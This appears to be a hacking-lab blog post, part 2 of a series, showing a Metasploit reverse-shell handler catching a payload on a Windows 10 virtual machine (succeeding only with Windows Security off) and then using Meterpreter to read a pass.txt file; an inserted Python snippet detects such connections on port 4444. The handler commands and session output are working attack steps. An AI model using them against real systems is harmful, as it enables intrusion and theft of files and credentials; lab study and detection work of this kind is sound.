[Hacking Lab] Planting it on a virtual Windows 10, part 2 [Security]
********** Previous article **********
********************
6. Lying in wait
Set up a listener in advance so that, once the virus has infected the target, it can reach back to Kali.
┌──(masaki㉿kali)-[~]
└─$ msfconsole 130 ⨯
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.0.56-dev ]
+ -- --=[ 2154 exploits - 1146 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Enable HTTP request and response logging
with set HttpTrace true
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload
payload => generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.56.111
LHOST => 192.168.56.111
msf6 exploit(multi/handler) > exploit -j -z
7. Virus infection (pattern 1)
This is the case where the file was downloaded with Windows Security turned ON.
To give the conclusion first: it fails.
msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.56.111:4444
msf6 exploit(multi/handler) > [-] Command shell session 1 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 1 closed.
[*] 192.168.56.102 - Command shell session 2 closed.
[*] 192.168.56.102 - Command shell session 3 closed.
[*] 192.168.56.102 - Command shell session 4 closed.
[*] 192.168.56.102 - Command shell session 5 closed.
[*] 192.168.56.102 - Command shell session 6 closed.
[*] 192.168.56.102 - Command shell session 7 closed.
[*] 192.168.56.102 - Command shell session 8 closed.
[*] 192.168.56.102 - Command shell session 9 closed.
[*] 192.168.56.102 - Command shell session 10 closed.
[*] 192.168.56.102 - Command shell session 11 closed.
[-] Command shell session 12 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 12 closed.
[-] Command shell session 13 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 13 closed.
[*] 192.168.56.102 - Command shell session 14 closed.
[-] Command shell session 15 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 15 closed.
[*] 192.168.56.102 - Command shell session 16 closed.
ccccccccccccccccccccccccccInterrupt: use the 'exit' command to quit
msf6 exploit(multi/handler) >
8. Virus infection (pattern 2)
This is the case where the file was downloaded with Windows Security turned OFF. This one succeeds; you can see that the connection has been established.
msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.56.111:4444
msf6 exploit(multi/handler) > [*] Sending stage (200262 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.111:4444 -> 192.168.56.102:60593) at 2021-10-17 11:13:17 +0900
msf6 exploit(multi/handler) > session -i
[-] Unknown command: session
msf6 exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-F0Q8FDQ\masaki @ DESKTOP-F0Q8FDQ 192.168.56.111:4444 -> 192.168.56.102:60593 (192.168.56.102)
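As an added example (not part of the original post), here is a small Python check of the kind a defender would run over host connection records to spot what section 8 shows from the other side: an outbound TCP connection from an executable that was just downloaded, going to port 4444, the default port the multi/handler above listened on. The log lines are constructed for this example, the field layout is an assumption rather than a real log format, and the file name update.exe is a placeholder for the downloaded payload; only the addresses and port come from the post.

```python
import re
from dataclasses import dataclass, field

# Constructed sample connection records for this example. The field layout
# (timestamp, pid, image, proto, src, dst) is an assumption, not a real log
# format, and update.exe is a placeholder for the downloaded payload; the
# addresses and port mirror the handler output in this post.
SAMPLE_LOG = """\
2021-10-17 11:13:17 pid=4212 image=C:\\Users\\masaki\\Downloads\\update.exe proto=tcp src=192.168.56.102:60593 dst=192.168.56.111:4444
2021-10-17 11:13:20 pid=1880 image=C:\\Program Files\\Mozilla Firefox\\firefox.exe proto=tcp src=192.168.56.102:60600 dst=203.0.113.10:443
2021-10-17 11:14:02 pid=3320 image=C:\\Windows\\System32\\svchost.exe proto=tcp src=192.168.56.102:60611 dst=192.168.56.1:445
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) pid=(?P<pid>\d+) image=(?P<image>.+?) proto=(?P<proto>\w+) "
    r"src=(?P<src>[\d.]+):(?P<sport>\d+) dst=(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# 4444 is the port the multi/handler in this post listened on (Metasploit's default).
SUSPICIOUS_PORTS = {4444}

# Executables launched straight out of a user's Downloads folder.
DOWNLOADS_RE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\Downloads\\", re.IGNORECASE)


@dataclass
class Finding:
    timestamp: str
    pid: int
    image: str
    dst: str
    reasons: list = field(default_factory=list)


def parse_line(line):
    """Parse one record into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["pid"] = int(rec["pid"])
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def analyze(log_text):
    """Return a Finding for every connection that trips at least one rule."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = []
        if DOWNLOADS_RE.match(rec["image"]):
            reasons.append("process image runs from a user Downloads folder")
        if rec["dport"] in SUSPICIOUS_PORTS:
            reasons.append(f"destination port {rec['dport']} is a default Metasploit handler port")
        if reasons:
            findings.append(Finding(rec["ts"], rec["pid"], rec["image"],
                                    f"{rec['dst']}:{rec['dport']}", reasons))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f.timestamp} pid={f.pid} {f.image} -> {f.dst}: " + "; ".join(f.reasons))
```

Run as a script it flags only the first record, on both rules; the browser and svchost connections pass. A real deployment would feed this from whatever network-connection telemetry the host produces, and the port list would be one signal among several rather than the deciding one, since a handler can listen on any port.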
9. Intrusion experiment
From here, let's get into the Windows 10 machine and look at the contents of its files.
The contents of pass.txt end up being exposed.
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > pwd
C:\Users\masaki\Downloads
meterpreter > cd ..
meterpreter > cd Documents
meterpreter > ls
Listing: C:\Users\masaki\Documents
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2021-10-10 21:06:47 +0900 My Music
40777/rwxrwxrwx 0 dir 2021-10-10 21:06:47 +0900 My Pictures
40777/rwxrwxrwx 0 dir 2021-10-10 21:06:47 +0900 My Videos
100666/rw-rw-rw- 402 fil 2021-10-10 21:08:51 +0900 desktop.ini
100666/rw-rw-rw- 14 fil 2021-10-17 11:19:21 +0900 pass.txt
meterpreter > cat pass.txt
sample pas txt
meterpreter >
-------------------------------------------------------
See you again in the next article.